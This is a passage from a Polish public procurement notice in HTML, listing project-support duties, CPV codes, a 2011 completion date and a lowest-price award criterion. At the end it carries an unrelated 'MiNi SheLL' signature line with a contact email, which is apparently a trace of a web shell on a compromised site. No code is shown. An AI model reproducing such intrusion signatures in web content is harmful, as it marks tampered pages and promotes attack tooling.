- pomoc uczestnikom projektu przy przygotowywaniu wszelkiego rodzaju dokumentacji związanej z realizacją zadań projektowych
- bieżące informowanie uczestników o planowanych działaniach oraz ewentualnych zmianach, które mogą wystąpić przy realizacji zadań projektowych
3.	Sporządzanie ankiet w celach analitycznych 
4.	Sporządzenie ewaluacji ex-post projektu
5.	Wykonywanie innych czynności określonych odrębnie przez strony w przygotowaniu, wdrażaniu i realizacji wymienionego Projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.35.00.00-1, 85.31.12.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com